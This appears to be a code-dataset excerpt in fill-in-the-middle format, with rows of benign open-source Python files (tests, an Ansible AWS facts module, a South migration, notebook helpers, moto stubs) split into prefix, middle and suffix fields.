repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
Magicjarvis/py | testing/root/test_error.py | Python | mit | 1,750 | 0.002286 |
import py
import errno
def test_error_classes():
for name in errno.errorcode.values():
x = getattr(py.error, name)
assert issubclass(x, py.error.Error)
assert issubclass(x, EnvironmentError)
def test_picklability_issue1():
e1 = py.error.ENOENT()
s = py.std.pickle.dumps(e1)
e2 = py.std.pickle.loads(s)
assert isinstance(e2, py.error.ENOENT)
def test_unknown_error():
num = 3999
cls = py.error._geterrnoclass(num)
assert cls.__name__ == 'UnknownErrno%d' % (num,)
assert issubclass(cls, py.error.Error)
assert issubclass(cls, EnvironmentError)
cls2 = py.error._geterrnoclass(num)
assert cls is cls2
def test_error_conversion_ENOTDIR(testdir):
p = testdir.makepyfile("")
excinfo = py.test.raises(py.error.Error, py.error.checked_call, p.listdir)
assert isinstance(excinfo.value, EnvironmentError)
assert isinstance(excinfo.value, py.error.Error)
assert "ENOTDIR" in r | epr(excinfo.value)
def test_checked_call_sup | ports_kwargs(tmpdir):
import tempfile
py.error.checked_call(tempfile.mkdtemp, dir=str(tmpdir))
try:
import unittest
unittest.TestCase.assertWarns
except (ImportError, AttributeError):
pass # required interface not available
else:
import sys
import warnings
class Case(unittest.TestCase):
def test_assertWarns(self):
# Clear everything "py.*" from sys.modules and re-import py
# as a fresh start
for mod in tuple(sys.modules.keys()):
if mod and (mod == 'py' or mod.startswith('py.')):
del sys.modules[mod]
import py
with self.assertWarns(UserWarning):
warnings.warn('this should work')
|
wusung/ipython-notebook-tabs | kyper/nbformat/v40/nbbase.py | Python | apache-2.0 | 4,854 | 0.003502 | """Python API for composing notebook elements
The Python representation of a notebook is a nested structure of
dictionary subclasses that support attribute access
(IPython.utils.ipstruct.Struct). The functions in this module are merely
helpers to build the structs in the right form.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from ..notebooknode import from_dict, NotebookNode
# Change this when incrementing the nbformat version
nbformat = 4
nbformat_minor = 1
nbformat_schema = 'nbformat.v4.schema.json'
def validate(node, ref=None):
"""validate a v4 node"""
from .. import validate
return validate(node, ref=ref, version=nbformat)
def new_output(output_type, data=None, **kwargs):
"""Create a new output, to go in the ``cell.outputs`` list of a code cell."""
output = NotebookNode(output_type=output_type)
# populate defaults:
if output_type == 'stream':
output.name = u'stdout'
output.text = u''
elif output_type in { | 'execute_result', 'display_data'}:
output.metadata = NotebookNode()
output.data = NotebookNode()
# load from args:
output.update(from_dict(kwargs))
if data is not None:
output.data = from_dict(data) |
# validate
validate(output, output_type)
return output
def output_from_msg(msg):
"""Create a NotebookNode for an output from a kernel's IOPub message.
Returns
-------
NotebookNode: the output as a notebook node.
Raises
------
ValueError: if the message is not an output message.
"""
msg_type = msg['header']['msg_type']
content = msg['content']
if msg_type == 'execute_result':
return new_output(output_type=msg_type,
metadata=content['metadata'],
data=content['data'],
execution_count=content['execution_count'],
)
elif msg_type == 'stream':
return new_output(output_type=msg_type,
name=content['name'],
text=content['text'],
)
elif msg_type == 'display_data':
return new_output(output_type=msg_type,
metadata=content['metadata'],
data=content['data'],
)
elif msg_type == 'error':
return new_output(output_type=msg_type,
ename=content['ename'],
evalue=content['evalue'],
traceback=content['traceback'],
)
else:
raise ValueError("Unrecognized output msg type: %r" % msg_type)
def new_code_cell(source='', **kwargs):
"""Create a new code cell"""
cell = NotebookNode(
cell_type='code',
metadata=NotebookNode(),
execution_count=None,
source=source,
outputs=[],
)
cell.update(from_dict(kwargs))
validate(cell, 'code_cell')
return cell
def new_markdown_cell(source='', **kwargs):
"""Create a new markdown cell"""
cell = NotebookNode(
cell_type='markdown',
source=source,
metadata=NotebookNode(),
)
cell.update(from_dict(kwargs))
validate(cell, 'markdown_cell')
return cell
def new_raw_cell(source='', **kwargs):
"""Create a new raw cell"""
cell = NotebookNode(
cell_type='raw',
source=source,
metadata=NotebookNode(),
)
cell.update(from_dict(kwargs))
validate(cell, 'raw_cell')
return cell
def new_worksheet(name=None, cells=None, metadata=None):
"""Create a worksheet by name with with a list of cells."""
ws = NotebookNode()
if cells is None:
ws.cells = []
else:
ws.cells = list(cells)
ws.metadata = NotebookNode(metadata or {})
return ws
def new_notebook(name=None, metadata=None, worksheets=None):
"""Create a notebook by name, id and a list of worksheets."""
nb = NotebookNode()
nb.nbformat = nbformat
nb.nbformat_minor = nbformat_minor
if worksheets is None:
nb.worksheets = []
else:
nb.worksheets = list(worksheets)
if metadata is None:
nb.metadata = new_metadata()
else:
nb.metadata = NotebookNode(metadata)
if name is not None:
nb.metadata.name = cast_unicode(name)
return nb
def new_metadata(name=None, authors=None, license=None, created=None,
modified=None, gistid=None):
"""Create a new metadata node."""
metadata = NotebookNode()
if name is not None:
metadata.name = cast_unicode(name)
if authors is not None:
metadata.authors = list(authors)
if created is not None:
metadata.created = cast_unicode(created)
if modified is not None:
metadata.modified = cast_unicode(modified)
if license is not None:
metadata.license = cast_unicode(license)
if gistid is not None:
metadata.gistid = cast_unicode(gistid)
return metadata
|
sijmenvos/Uforia-browser | nodejs/build_index/uf_func/uf_admin.py | Python | gpl-2.0 | 1,899 | 0.008952 | #!/usr/bin/env python
# Copyright (C) 2014 Hogeschool van Amsterdam
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version | .
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even t | he implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
import uf_globals
from ast import literal_eval
import json
def parse_admin_config():
"""
The admin config file is in full JSON format.
"""
supmimetable = uf_globals.db.read_table(_table="supported_mimetypes", columnsonly=False)
# mainkey = 'modules'
configarray = []
# ml[mainkey] = {}
for line in supmimetable:
ml = {}
# print line
mimetype = line[0]
tables_dict = literal_eval(line[1])
mimetype = mimetype.replace("/","_")
ml['name'] = mimetype.encode('ascii')
ml['modules'] = tables_dict
#print ml
#sys.exit(0)
fields = []
for table in tables_dict:
columns = uf_globals.db.read_table(_table=tables_dict[table]) # returns columns only by default
fields.append([x[0].encode('ascii') for x in columns]) # mysql returns it in unicode format which we don't want
# merge the lists
fields = [item for sublist in fields for item in sublist]
fields = list(set(fields)) # remove duplications
ml['fields'] = fields
configarray.append(ml)
with open('include/uforia_admin.cfg', 'wb') as outfile:
json.dump(configarray, outfile, indent=4, sort_keys=True)
print("File intluce/uforia_admin.cfg has been successfully created.")
|
Schevo/schevo | schevo/expression.py | Python | mit | 1,535 | 0.003909 | """Utilities for forming search expressions based on field classes."""
# Copyright (c) 2001-2009 ElevenCraft Inc.
# See LICENSE for details.
import sys
from schevo.lib import optimize
from operator import and_, eq, or_
from schevo.base import Field
class Expression(object):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def __and__(left, right):
return Expression(left, and_, right)
def __or__(left, right):
return Expression(left, or_, right)
def single_extent_field_equality_criteria(self):
if (isinstance(self.left, type)
and issubclass(self.left, Field)
and self.op == eq
and not isinstance(self.right, (Expression, Field))
):
return {self.left: self.right}
elif (isinstance(self.left, Expression)
and self.op == and_
and isinstance(self.right, Expression)
):
criteria = self.left. | single_extent_field_equality_criteria()
criteria.update(self.right.single_extent_field_equality_criteria())
if len(frozenset(key._extent for key in criteria)) > 1:
raise ValueError(
'Not a single-extent field equality intersection criteria.')
return criteria
else:
raise ValueError(
'Not a single-extent field equality intersection c | riteria.')
optimize.bind_all(sys.modules[__name__]) # Last line of module.
|
e-gob/plataforma-kioscos-autoatencion | scripts/ansible-play/.venv/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ec2_asg_facts.py | Python | bsd-3-clause | 13,766 | 0.001961 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_asg_facts
short_description: Gather facts about ec2 Auto Scaling Groups (ASGs) in AWS
description:
- Gather facts about ec2 Auto Scaling Groups (ASGs) in AWS
version_added: "2.2"
author: "Rob White (@wimnat)"
options:
name:
description:
- The prefix or name of the auto scaling group(s) you are searching for.
- "Note: This is a regular expression match with implicit '^' (beginning of string). Append '$' for a complete name match."
required: false
tags:
description:
- >
A dictionary/hash of tags in the format { tag1_name: 'tag1_value', tag2_name: 'tag2_value' } to match against the auto scaling
group(s) you are searching for.
required: false
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Find all groups
- ec2_asg_facts:
register: asgs
# Find a group with matching name/prefix
- ec2_asg_facts:
name: public-webserver-asg
register: asgs
# Find a group with matching tags
- ec2_asg_facts:
tags:
project: webapp
env: production
register: asgs
# Find a group with matching name/prefix and tags
- ec2_asg_facts:
name: myproject
tags:
env: production
register: asgs
# Fail if no groups are found
- ec2_asg_facts:
name: public-webserver-asg
register: asgs
failed_when: "{{ asgs.results | length == 0 }}"
# Fail if more than 1 group is found
- ec2_asg_facts:
name: | public-webserver-asg
register: asgs
failed_when: "{{ asgs.resu | lts | length > 1 }}"
'''
RETURN = '''
---
auto_scaling_group_arn:
description: The Amazon Resource Name of the ASG
returned: success
type: string
sample: "arn:aws:autoscaling:us-west-2:1234567890:autoScalingGroup:10787c52-0bcb-427d-82ba-c8e4b008ed2e:autoScalingGroupName/public-webapp-production-1"
auto_scaling_group_name:
description: Name of autoscaling group
returned: success
type: str
sample: "public-webapp-production-1"
availability_zones:
description: List of Availability Zones that are enabled for this ASG.
returned: success
type: list
sample: ["us-west-2a", "us-west-2b", "us-west-2a"]
created_time:
description: The date and time this ASG was created, in ISO 8601 format.
returned: success
type: string
sample: "2015-11-25T00:05:36.309Z"
default_cooldown:
description: The default cooldown time in seconds.
returned: success
type: int
sample: 300
desired_capacity:
description: The number of EC2 instances that should be running in this group.
returned: success
type: int
sample: 3
health_check_period:
description: Length of time in seconds after a new EC2 instance comes into service that Auto Scaling starts checking its health.
returned: success
type: int
sample: 30
health_check_type:
description: The service you want the health status from, one of "EC2" or "ELB".
returned: success
type: str
sample: "ELB"
instances:
description: List of EC2 instances and their status as it relates to the ASG.
returned: success
type: list
sample: [
{
"availability_zone": "us-west-2a",
"health_status": "Healthy",
"instance_id": "i-es22ad25",
"launch_configuration_name": "public-webapp-production-1",
"lifecycle_state": "InService",
"protected_from_scale_in": "false"
}
]
launch_config_name:
description: >
Name of launch configuration associated with the ASG. Same as launch_configuration_name,
provided for compatibility with ec2_asg module.
returned: success
type: str
sample: "public-webapp-production-1"
launch_configuration_name:
description: Name of launch configuration associated with the ASG.
returned: success
type: str
sample: "public-webapp-production-1"
load_balancer_names:
description: List of load balancers names attached to the ASG.
returned: success
type: list
sample: ["elb-webapp-prod"]
max_size:
description: Maximum size of group
returned: success
type: int
sample: 3
min_size:
description: Minimum size of group
returned: success
type: int
sample: 1
new_instances_protected_from_scale_in:
description: Whether or not new instances a protected from automatic scaling in.
returned: success
type: boolean
sample: "false"
placement_group:
description: Placement group into which instances are launched, if any.
returned: success
type: str
sample: None
status:
description: The current state of the group when DeleteAutoScalingGroup is in progress.
returned: success
type: str
sample: None
tags:
description: List of tags for the ASG, and whether or not each tag propagates to instances at launch.
returned: success
type: list
sample: [
{
"key": "Name",
"value": "public-webapp-production-1",
"resource_id": "public-webapp-production-1",
"resource_type": "auto-scaling-group",
"propagate_at_launch": "true"
},
{
"key": "env",
"value": "production",
"resource_id": "public-webapp-production-1",
"resource_type": "auto-scaling-group",
"propagate_at_launch": "true"
}
]
target_group_arns:
description: List of ARNs of the target groups that the ASG populates
returned: success
type: list
sample: [
"arn:aws:elasticloadbalancing:ap-southeast-2:123456789012:targetgroup/target-group-host-hello/1a2b3c4d5e6f1a2b",
"arn:aws:elasticloadbalancing:ap-southeast-2:123456789012:targetgroup/target-group-path-world/abcd1234abcd1234"
]
target_group_names:
description: List of names of the target groups that the ASG populates
returned: success
type: list
sample: [
"target-group-host-hello",
"target-group-path-world"
]
termination_policies:
description: A list of termination policies for the group.
returned: success
type: str
sample: ["Default"]
'''
import re
try:
from botocore.exceptions import ClientError
except ImportError:
pass # caught by imported HAS_BOTO3
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (get_aws_connection_info, boto3_conn, ec2_argument_spec,
camel_dict_to_snake_dict, HAS_BOTO3)
def match_asg_tags(tags_to_match, asg):
for key, value in tags_to_match.items():
for tag in asg['Tags']:
if key == tag['Key'] and value == tag['Value']:
break
else:
return False
return True
def find_asgs(conn, module, name=None, tags=None):
"""
Args:
conn (boto3.AutoScaling.Client): Valid Boto3 ASG client.
name (str): Optional name of the ASG you are looking for.
tags (dict): Optional dictionary of tags and values to search for.
Basic Usage:
>>> name = 'public-webapp-production'
>>> tags = { 'env': 'production' }
>>> conn = boto3.client('autoscaling', region_name='us-west-2')
>>> results = find_asgs(name, conn)
Returns:
List
[
{
"auto_scaling_group_arn": (
"arn:aws:autoscaling:us-west-2:275977225706:autoScalingGroup:58abc686-9783-4528-b338-3ad6f1cbbbaf:"
"autoScalingGroupName/public-webapp-production"
),
"auto_scaling_group_name": "public-webapp-production",
"availability_zones": ["us-west-2c", "us-west-2b", "us-west-2a"],
"created_time": "2016-02-02T23:2 |
JoKaWare/WTL-DUI | tools/grit/grit/gather/admin_template_unittest.py | Python | bsd-3-clause | 3,990 | 0.006266 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for the admin template gatherer.'''
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
import StringIO
import tempfile
import unittest
from grit.gather import admin_template
from grit import util
from grit import grd_reader
from grit import grit_runner
from grit.tool import build
class AdmGathererUnittest(unittest.TestCase):
def testParsingAndTranslating(self):
pseudofile = StringIO.StringIO(
'bingo bongo\n'
'ding dong\n'
'[strings] \n'
'whatcha="bingo bongo"\n'
'gotcha = "bingolabongola "the wise" fingulafongula" \n')
gatherer = admin_template.AdmGatherer.FromFile(pseudofile)
gatherer.Parse()
self.failUnless(len(gatherer.GetCliques()) == 2)
self.failUnless(gatherer.GetCliques()[1].GetMessage().GetRealContent() ==
'bingolabongola "the wise" fingulafongula')
translation = gatherer.Translate('en')
self.failUnless(translation == gatherer.GetText().strip())
def testErrorHandling(self):
pseudofile = StringIO.StringIO(
'bingo bongo\n'
'ding dong\n'
'whatcha="bingo bongo"\n'
'gotcha = "bingolabongola "the wise" fingulafongula" \n')
gatherer = admin_template.AdmGatherer.FromFile(pseudofile)
self.assertRaises(admin_template.MalformedAdminTemplateException,
gatherer.Parse)
_TRANSLATABLES_FROM_FILE = (
'Google', 'Google Desktop', 'Preferences',
'Controls Google Desktop preferences',
'Indexing and Capture Control',
'Controls what files, web pages, and other content will be indexed by Google Desktop.',
'Prevent indexing of email',
# there are lots more but we don't check any further
)
def VerifyCliquesFromAdmFile(self, cliques):
self.failUnless(len(cliques) > 20)
for ix in range(len(self._TRANSLATABLES_FROM_FILE)):
text = cliques[ix].GetMessage().GetRealContent()
self.failUnless(text == self._TRANSLATABLES_FROM_FILE[ix])
def testFromFile(self):
fname = util.PathFromRoot('grit/testdata/GoogleDesktop.adm')
gatherer = admin_template.AdmGatherer.FromFile(fname)
gatherer.Parse()
cliques = gatherer.GetCliques()
self.VerifyCliquesFromAdmFile(cliques)
def MakeGrd(self):
grd = grd_reader.Parse(StringIO.StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3">
<release seq="3">
<structures>
<struc | ture type="admin_template" name="IDAT_GOOGLE_DESKTOP_SEARCH"
file="GoogleDesktop.adm" exclude_from_rc="true" />
<structure type="txt" name="BINGOBONGO"
file="README.txt" exclude_from_rc="true" />
</structures>
</release>
<outputs>
<output filename="de_res.rc" type="rc_all" lang="de" />
</outputs>
</grit>'''), util.PathFromRoot('grit/testdata'))
grd.SetOutputContext('en', {})
grd.RunGatherers(recur | sive=True)
return grd
def testInGrd(self):
grd = self.MakeGrd()
cliques = grd.children[0].children[0].children[0].GetCliques()
self.VerifyCliquesFromAdmFile(cliques)
def testFileIsOutput(self):
grd = self.MakeGrd()
dirname = tempfile.mkdtemp()
try:
tool = build.RcBuilder()
tool.o = grit_runner.Options()
tool.output_directory = dirname
tool.res = grd
tool.Process()
self.failUnless(os.path.isfile(
os.path.join(dirname, 'de_GoogleDesktop.adm')))
self.failUnless(os.path.isfile(
os.path.join(dirname, 'de_README.txt')))
finally:
for f in os.listdir(dirname):
os.unlink(os.path.join(dirname, f))
os.rmdir(dirname)
if __name__ == '__main__':
unittest.main()
|
rocky/python2-trepan | trepan/processor/command/set_subcmd/patsub.py | Python | gpl-3.0 | 1,775 | 0 | # -*- coding: utf-8 -*-
# Copyright (C) 2020 Rocky Bernstein
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/license | s/>.
# Our local modules
from trepan.processor.command import base_subcmd as Mbase_subcmd
class SetPatSub(Mbase_subcmd.DebuggerSubcommand):
"""**set patsub** *from-r | e* *replace-string*
Add a substitution pattern rule replacing *patsub* with
*replace-string* anywhere it is found in source file names. If a
substitution rule was previously set for *from-re*, the old rule is
replaced by the new one.
In the following example, suppose in a docker container /mnt/project is
the mount-point for /home/rocky/project. You are running the code
from the docker container, but debugging this from outside of that.
Example:
--------
set patsub ^/mmt/project /home/rocky/project
"""
in_list = True
max_args = 2
min_abbrev = len("pats")
min_args = 2
short_help = "Set pattern substitution rule"
def run(self, args):
self.proc.add_remap_pat(args[0], args[1])
pass
if __name__ == "__main__":
from trepan.processor.command.set_subcmd import __demo_helper__ as Mhelper
Mhelper.demo_run(SetPatSub)
pass
|
heromod/migrid | mig/shared/functionality/lsvgridmembers.py | Python | gpl-2.0 | 2,788 | 0.001076 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# --- BEGIN_HEADER ---
#
# lsvgridmembers - simple list of vgrid members for a grid with access
# Copyright (C) 2003-2014 The MiG Project lead by Brian Vinter
#
# This file is part of MiG.
#
# MiG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License | as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# MiG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the imp | lied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# -- END_HEADER ---
#
"""List all user IDs in the list of members for a given vgrid if user has
access to the vgrid.
"""
import shared.returnvalues as returnvalues
from shared.functional import validate_input_and_cert, REJECT_UNSET
from shared.init import initialize_main_variables
from shared.vgrid import init_vgrid_script_list, vgrid_list
def signature():
"""Signature of the main function"""
defaults = {'vgrid_name': REJECT_UNSET}
return ['list', defaults]
def main(client_id, user_arguments_dict):
"""Main function used by front end"""
(configuration, logger, output_objects, op_name) = \
initialize_main_variables(client_id)
defaults = signature()[1]
(validate_status, accepted) = validate_input_and_cert(
user_arguments_dict,
defaults,
output_objects,
client_id,
configuration,
allow_rejects=False,
)
if not validate_status:
return (accepted, returnvalues.CLIENT_ERROR)
vgrid_name = accepted['vgrid_name'][-1]
# Validity of user and vgrid names is checked in this init function so
# no need to worry about illegal directory traversal through variables
(ret_val, msg, ret_variables) = init_vgrid_script_list(vgrid_name,
client_id, configuration)
if not ret_val:
output_objects.append({'object_type': 'error_text', 'text'
: msg})
return (output_objects, returnvalues.CLIENT_ERROR)
# list
(status, msg) = vgrid_list(vgrid_name, 'members', configuration)
if not status:
output_objects.append({'object_type': 'error_text', 'text': '%s'
% msg})
return (output_objects, returnvalues.SYSTEM_ERROR)
output_objects.append({'object_type': 'list', 'list': msg})
return (output_objects, returnvalues.OK)
|
opendatapress/open_data_press | tests/test_helpers/test_config.py | Python | mit | 730 | 0 | # -*- coding: utf-8 -*-
import os
import unittest
from helpers.config import l | oad_config, ConfigurationError
class LoadConfigTest(unittest.TestCase):
| def test_development_config(self):
os.environ['SERVER_SOFTWARE'] = 'Dev-XXX'
config = load_config()
self.assertIsInstance(config, dict)
self.assertTrue(config['debug'])
def test_production_config(self):
os.environ['SERVER_SOFTWARE'] = 'Live-XXX'
config = load_config()
self.assertIsInstance(config, dict)
self.assertFalse(config['debug'])
def test_configuration_error(self):
# Ensure that ConfigurationError is an Exception
self.assertTrue(Exception in ConfigurationError.__bases__)
|
ramaseshan/symptomchecker | symptomcheck/src/profiles/apps.py | Python | gpl-2.0 | 226 | 0 | from __future__ import unicode_literals
from django.apps import AppC | onfig
class ProfileConf | ig(AppConfig):
name = "profiles"
verbose_name = 'User Profiles'
def ready(self):
from . import signals # noqa
|
anomen-s/programming-challenges | gopas.cz/python_adv/4_pickle.py | Python | gpl-2.0 | 580 | 0 | import pickle
import shelve
jmena = 'Petr,Jan,Tomáš'.split(',')
with open('/tmp/jmena.bin', 'wb') as f:
pickle.dump(jmena, f)
pickle.dump(0x202073612020, f)
pickle.dump({k: v for k, v in enumerate(jmena)}, f)
with open('/tmp/jmena.bin', 'rb') as f:
print(*[pickle.load(f) for | _ in range(3)], sep='\n')
print('-' * 30)
# shelve uses dbm database
with shelve.open('/tmp/shelve.bin') as data:
data['jmeno'] = 'Tomáš'
data['dict'] = {1: 'erste', 2: 4545}
with shelve.open('/tmp/shelve.bin') as data:
print(data['jmeno'] | )
print(data['dict'])
|
makinacorpus/ionyweb | ionyweb/plugin_app/plugin_links_list/migrations/0003_auto__add_field_plugin_linkslist_title_rule.py | Python | bsd-3-clause | 12,269 | 0.008069 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Plugin_LinksList.title_rule'
db.add_column('plugin_links_list_plugin_linkslist', 'title_rule',
self.gf('django.db.models.fields.BooleanField')(default=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Plugin_LinksList.title_rule'
db.delete_column('plugin_links_list_plugin_linkslist', 'title_rule')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [] | , {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank' | : 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'file_manager.directory': {
'Meta': {'object_name': 'Directory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['file_manager.Directory']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'})
},
'file_manager.filemanager': {
'Meta': {'object_name': 'FileManager'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'root': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'filemanager'", 'null': 'True', 'blank': 'True', 'to': "orm['file_manager.Directory']"})
},
'page.page': {
'Meta': {'object_name': 'Page'},
'app_page_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'app_page_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'default_template': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'draft': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_diplayed_in_menu': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'last_modif': ('django.db.models.fields.DateField', [], {'auto_now': 'True', 'blank': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'menu_title': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'meta_description': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'blank': 'True'}),
'meta_keywords': ('django.db.models.fields.CharField', [], {'max_length': "'255'", 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['page.Page']"}),
'placeholder_slug': ('django.db.models.fields.SlugField', [], {'default': "'content-placeholder-1'", 'max_length': '50'}),
'plugin_order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'sha1': ('django.db.models.fields.CharField', [], {'max_length': '40', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'website': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pages'", 'to': "orm['website.WebSite']"})
},
'plugin.pluginrelation': {
'Meta': {'ordering': "['plugin_order']", 'object_name': 'PluginRelation'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'display_on_new_pages': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'pages': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'plugins'", 'symmetrical': 'False', 'to': "orm['page.Page']"}),
'placeholder_slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}),
'plugin_order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
|
spulec/moto | moto/ec2/responses/reserved_instances.py | Python | apache-2.0 | 1,409 | 0.004258 | from moto.core.responses import BaseResponse
class ReservedInstances(BaseResponse):
def cancel_reserved_instances_listing(self):
if self.is_not_dryrun("CancelReservedInstances"):
raise NotImplementedError(
"ReservedInstances.cancel_reserved_instances_listing is not yet implemented"
)
def create_reserved_instances_listing(self):
| if self.is_not_dryrun("CreateReservedInstances"):
raise NotImplementedError(
"ReservedInstances.create_reserved_instances_listing is not yet implemented"
)
def describe_reserved_instances(self):
raise NotImplementedError(
"ReservedInstances.describe_reserved_instances is not yet implemented"
)
def describe_reserved_instances_listings(self):
raise NotImplementedError(
"ReservedInstances.des | cribe_reserved_instances_listings is not yet implemented"
)
